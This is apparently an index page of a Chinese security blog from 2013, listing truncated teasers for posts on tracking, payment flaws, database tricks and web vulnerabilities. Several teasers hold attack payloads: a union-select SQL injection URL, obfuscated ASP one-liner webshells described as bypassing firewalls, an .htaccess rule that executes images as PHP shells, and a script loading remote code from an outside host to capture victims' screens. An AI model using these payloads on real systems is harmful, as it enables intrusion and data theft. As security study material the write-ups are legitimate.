不使用 Cookie 的“Cookie”技术–Etag
admin 12年前 (2013-08-26) 2576浏览 0评论
有另一种方法可以跟踪用户而不使用cookies或Javascript。这种方法 已经被用于无数网站,但几乎没人人们知道。本页解释这种方法是如何运作的,以及是如何保护你自己的。 这种跟踪方式 无需使用: Cookies Javascript Loca...
jinglingshu的博客--耐得住寂寞,才能守得住繁华
admin 12年前 (2013-08-26) 2576浏览 0评论
有另一种方法可以跟踪用户而不使用cookies或Javascript。这种方法 已经被用于无数网站,但几乎没人人们知道。本页解释这种方法是如何运作的,以及是如何保护你自己的。 这种跟踪方式 无需使用: Cookies Javascript Loca...
admin 12年前 (2013-08-24) 3807浏览 2评论
本 文受《冬吴相对论》启发,试图以公司基因解码百度阿里腾讯,如何在移动互联网的未来继续盈利。视角从创始人自身角度以及,公司文化环境等过去诸多方面来思 考这三个巨头会如何盈利移动未来。各巨头都有混搭盈利想整合全部产业链的倾向,但以下是预测是各巨头盈...
admin 12年前 (2013-08-24) 1913浏览 0评论
它们游离在法律边缘,但影响着普通用户的网络环境,甚至参与制定地上规则 阑夕 2013-04-09 07:05 前阿里巴巴集团高级安全专家 @aullik5 曾在其微信公众帐号“道哥的黑板报”上分享了一则关于“黑客”的故事,文章颇具传奇小说的风格,不少...
admin 12年前 (2013-08-24) 6119浏览 1评论
貌似很多朋友拿着库,用BAT 或者PHP读取TXT的形式来扫,文件太大了的话,1,2分钟估计都查不出来,因为导入库是一个不错的方法,很多都不知道怎么搭建的吧,用MSSQL或则 ORACLE来搭建的,个人感觉没那必要,原因在于安装他们需要的空间很大,运...
admin 12年前 (2013-08-24) 2605浏览 1评论
先看一个注入点: http://www. .cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,concat(database(),0x5c,user(),0x5c,version()),8,...
admin 12年前 (2013-08-24) 2199浏览 1评论
最近乌云社区里有位童鞋发了一个帖子: 说一个域名不知道用了什么手法居然绑定了李毅吧的url,既不是301重定向,也不是域名跳转,也不是域名转发。访问 www.liyiba.com 这个域名感觉李毅吧仿佛单独成立了一个网站一样!而且这个域名的权重居然涨...
admin 12年前 (2013-08-24) 1440浏览 0评论
用反射,比如想知道函数hello是哪个文件里的哪行定义的: 1 2 3 $obj = new ReflectionFunction("hello"); $file = $obj->getFileName(); $line =...
admin 12年前 (2013-08-24) 1480浏览 0评论
ps:这篇文章是《支付漏洞的三种常见类型》(http://jinglingshu.org/?p=1804)的一个案例,符合第二种情况:即没有对购买数量进行限制,导致可以将数量修改为负值。 1、首先进入商城,购买任意商品,提交商品数量时抓...
admin 12年前 (2013-08-24) 1651浏览 0评论
这个漏洞在酷狗旗下的繁星网: fanxing.kugou.com 情景再现: 情况分析: 繁星网相册处因为对上传的文件名没有做很好的过滤,我们只要开启抓包软件 看到提交的数据是: ——...
admin 12年前 (2013-08-23) 2639浏览 0评论
在使用xml-rpc的时候,server端获取client数据,主要是通过php输入流input,而不是$_POST数组。所以,这里主要探讨php输入流php://input。 下面的例子摘取的是wordpress中的一段代码,里面有用到http:...
admin 12年前 (2013-08-23) 1809浏览 0评论
1.完整备份一次(保存位置当然可以改) backup database 库名 to disk = ‘c:\ddd.bak’;– 2.创建表并插曲入数据 create table [dbo].[dtest] ([cm...
admin 12年前 (2013-08-23) 3027浏览 0评论
几个变性的asp–过防火墙 过狗效果都不错 1 <%Y=request("x")%> <%execute(Y)%> 1 <%eval (eval(chr(114)+chr(101)+c...
admin 12年前 (2013-08-22) 9251浏览 0评论
PHP LFI读php文件源码以及直接post webshell 2013-08-17 15:25:15| 分类: 安全 |字号 订阅 最近在忙defcon的题目集训 其中有一套题目里 有个老外写的writeup中提到了LFI的另一种...
admin 12年前 (2013-08-22) 2120浏览 0评论
较老的漏洞了,今儿扒拉出来晒晒吧:) 以下内容来至:大风 今天要讲的这个漏洞是一个非常猥琐的漏洞。 大部分网站都有这个漏洞,不光是百度。 什么是xsio xsio是因为没有限制图片的position属性为absolute,导致可以控制一张图片出现在网...
admin 12年前 (2013-08-21) 2042浏览 0评论
Backtrack 已经内置了一个由” Offebnsive Security”提供的漏洞利用程序集的数据库Exploit-DB,可以用于平时的参考和使用。访问的方法是在命令提示符中输入一下命令: 1 # cd /pentest/expl...
admin 12年前 (2013-08-21) 2048浏览 2评论
直到最近为止,对拥有数之不尽的独立地址的互联网进行整体扫描还是一种非常缓慢而“劳动密集型”的过程。举例来说,有人曾使用nmap进行过一次扫描,想要搜集有关加密技术在线使用量的数据。其结果是,这一过程足足花了两三个月时间。 密歇根大学研究人员觉得,他...
admin 12年前 (2013-08-20) 2318浏览 0评论
2个月前,长短短(Sogili)在群里发了一个html2canvas.js 并给了一个POC 我写了一个完整的js来获得对方的屏幕截图 看代码 document.write("<script src=\"http:\/\/xj.hk\/h...
admin 12年前 (2013-08-20) 1646浏览 0评论
很久很久以前剑心大叔叫我写过这样一篇文章,当时还没放假,就没去搭理他,嘿嘿。最近,小E又来找我写关于支付漏洞的文章,好吧,写就写了,趁暑假还有一点余额,就写这篇文章和大家来谈谈支付漏洞。(写得不好,大牛勿怪) ———- 根据乌云上的案例,支付漏洞一般...
admin 12年前 (2013-08-20) 2695浏览 1评论
这几天看了下htaccess的一些东东。首先环境要支持.htaccess,apache啥的。 php的.htaccess 第一种,添加扩展 AddType application/x-httpd-php .jpg 把shell扩展名修改为...
admin 12年前 (2013-08-20) 1850浏览 1评论
author:0x007er email:0x007er@gmail.com 说明:本文乃原创,同时也很菜 只是分享出自己一些想法 如有雷同 纯属科学现象 其实是这样的,我们平时经常看到一些漏洞扫描网站,诸如360网站安全检测 ScanV网站安全...